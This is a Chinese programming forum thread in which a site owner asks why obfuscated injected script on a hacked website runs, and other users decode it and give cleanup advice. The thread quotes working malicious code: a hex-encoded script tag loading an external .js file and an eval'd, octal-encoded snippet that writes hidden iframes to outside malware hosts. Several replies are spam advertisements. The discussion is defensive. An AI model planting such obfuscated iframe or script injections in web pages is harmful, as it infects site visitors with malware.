网站被挂马了。。。大侠帮帮。。

网站被挂马了。。。
<script>document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x4F\x25\x36\x36\x25\x36\x36\x25\x34\x39\x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\x25\x35\x33\x25\x36\x35\x25\x37\x32\x76\x2E\x25\x34\x33\x25\x36\x46\x25\x34\x44\x2F\x25\x34\x36\x25\x34\x31\x25\x35\x31\x25\x32\x45\x25\x36\x41\x25\x37\x33\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E");</script>

不明白上面的
\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x4F\x25\x36\x36\x25\x36\x36\x25\x34\x39\x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\x25\x35\x33\x25\x36\x35\x25\x37\x32\x76\x2E\x25\x34\x33\x25\x36\x46\x25\x34\x44\x2F\x25\x34\x36\x25\x34\x31\x25\x35\x31\x25\x32\x45\x25\x36\x41\x25\x37\x33\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E
为什么也可以运行。。。
是加密的吗？
怎么加密和解密的。
那位大侠能说说她的原理，或丢写参考资料、！！！ --------------------编程问答-------------------- 等着。。。。 --------------------编程问答-------------------- 友情顶上,被木马攻击实在麻烦,表示同情！ --------------------编程问答-------------------- a .a 
lai ren a  --------------------编程问答-------------------- 来人啊。。。。 --------------------编程问答-------------------- 这是个什么东西哦？运行了这段脚本之后有啥反应？ --------------------编程问答-------------------- 写成ascii了
原文:
<script src=http://OffIce.FAQServ.CoM/FAQ.js>
--------------------编程问答-------------------- JavaScript执行16进制时会自行转换为对应字符。 --------------------编程问答-------------------- 你是怎么把她转换过来的？ --------------------编程问答-------------------- 格式化！！（我乱讲的） --------------------编程问答-------------------- 看看。 --------------------编程问答-------------------- 这个我遇到过，你要是找到它的连接登进去看一下，非把你吓死不可，啥子功能都有，就连你的服务器文件，数据库都可以删除，想干吗干吗！我当时狂看IIS日志，才找到木马文件所在，将文件清了就可以了。不过，你网站肯定有漏洞，还是要把洞补了才得行！ --------------------编程问答-------------------- 很简单，不让你直接看到他的地址而以。
做个转换即可：

<script type="text/javascript"> 

    

    var url = "\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x4F\x25\x36\x36\x25\x36\x36\x25\x34\x39\x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\x25\x35\x33\x25\x36\x35\x25\x37\x32\x76\x2E\x25\x34\x33\x25\x36\x46\x25\x34\x44\x2F\x25\x34\x36\x25\x34\x31\x25\x35\x31\x25\x32\x45\x25\x36\x41\x25\x37\x33\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E"; 

    alert(decodeURI(url));

    

    </script> 

--------------------编程问答--------------------
汗

eval("\166\141\162\40\124\150\145\156\40\75\40\156\145\167\40\104\141\164\145\50\51\73\15\12\124\150\145\156\56\163\145\164\124\151\155\145\50\124\150\145\156\56\147\145\164\124\151\155\145\50\51\40\53\40\63\60\52\66\60\52\61\60\60\60\40\51\73\40\15\12\166\141\162\40\143\157\157\153\151\145\123\164\162\151\156\147\40\75\40\156\145\167\40\123\164\162\151\156\147\50\144\157\143\165\155\145\156\164\56\143\157\157\153\151\145\51\73\15\12\166\141\162\40\143\157\157\153\151\145\110\145\141\144\145\162\40\75\40\47\141\153\170\170\47\40\73\15\12\166\141\162\40\142\145\147\151\156\120\157\163\151\164\151\157\156\40\75\40\143\157\157\153\151\145\123\164\162\151\156\147\56\151\156\144\145\170\117\146\50\143\157\157\153\151\145\110\145\141\144\145\162\51\73");
if (beginPosition == -1)
   {
   document.write('<iframe height="0" frameborder="1" src="http://www.59.vc/page/add_54738542.htm" width="10" ></iframe>');
   document.write('<iframe height="0" frameborder="1" src="http://office.faqserv.com/faq.htm" width="10" ></iframe>');
   document.cookie = "Cookieakxx=akxx;expires="+ Then.toGMTString() +";path=/";
   } --------------------编程问答-------------------- var Then = new Date(); Then.setTime(Then.getTime() + 30*60*1000 ); var cookieString = new String(document.cookie); var cookieHeader = 'akxx' ; var beginPosition = cookieString.indexOf(cookieHeader); 

if (beginPosition == -1) 
   { 
   document.write(' <iframe height="0" frameborder="1" src="http://www.59.vc/page/add_54738542.htm" width="10" > </iframe> '); 
   document.write(' <iframe height="0" frameborder="1" src="http://office.faqserv.com/faq.htm" width="10" > </iframe> '); 
   document.cookie = "Cookieakxx=akxx;expires="+ Then.toGMTString() +";path=/"; 
   } --------------------编程问答-------------------- 关注一下 --------------------编程问答-------------------- 99% 是SqlServer 招惹的。
 
执行
 Use Master
           exec sp_dropextendedproc 'xp_cmdshell'
           Go

数据库专心作数据库，不要控制windows。 --------------------编程问答-------------------- 你设置权限就可以了..你的网站是不是有上传功能 --------------------编程问答-------------------- js木马，系统要注意打上ms06-014、ms07-17补丁
删除后不再出现最好，呵呵。
有时要防止局域网内其他中木马的机器再次进行感染，可通过arp防火墙禁止。

暂时可以在 hosts文件中加入如下内容就可以屏蔽文件中定义的对应的网址。 （文件位置C:\WINDOWS\system32\drivers\etc 可以用记事本打开）
127.0.0.1 localhost 
127.0.0.1 www.59.vc  
127.0.0.1 59.vc 
127.0.0.1 OffIce.FAQServ.com  
127.0.0.1 FAQServ.com 
127.0.0.1 www.FAQServ.com 
进行屏蔽 --------------------编程问答-------------------- UP --------------------编程问答-------------------- 这问题很严重，很明显是网站存在漏洞而被攻击了，若需要安全技术服务请联系EMAIL & MSN：yisheng@hotmail.com， 7X24 为您的网站保驾护航。 --------------------编程问答-------------------- 安全第一啊.

不过你连"javascript"字符串都没过滤,最起码的安全工作都没有做啊. --------------------编程问答-------------------- 顶啊 --------------------编程问答-------------------- --------------------编程问答--------------------

引用 23 楼 sineblog 的回复:

我写这篇文章完全是出于感谢Sine安全帮我解决了困扰了我的大问题！
最近很多网友反映站点提示有病毒,而且我也发现了conn.asp被挂上木马代码了 我去掉后没过多久又被挂马了！没办法天天被挂马这样站点就无法生存了！最后通过朋友介绍找到了Sine安全,解决掉了挂马现在一直很稳定非常感谢他们！而且技术是专业做安全。

Sine安全解决掉了我的站点被挂马的问题,网站现在流量也增加了收入也多了在此……

广告   --------------------编程问答-------------------- 服务器的问题 --------------------编程问答-------------------- 服务器的问题 --------------------编程问答-------------------- http://OffIce.FAQServ.CoM/FAQ.js  --------------------编程问答-------------------- http://topic.csdn.net/u/20090729/14/26381958-0d6e-4b90-bc90-d275e9621f93.html --------------------编程问答-------------------- up.... --------------------编程问答-------------------- 同情。。。。。。。。。。。 --------------------编程问答--------------------

引用 20 楼 heyisheng 的回复:

这问题很严重，很明显是网站存在漏洞而被攻击了，若需要安全技术服务请联系EMAIL & MSN：yisheng@hotmail.com， 7X24 为您的网站保驾护航。

这个广告很到位啊~~

补充：.NET技术 ,  ASP.NET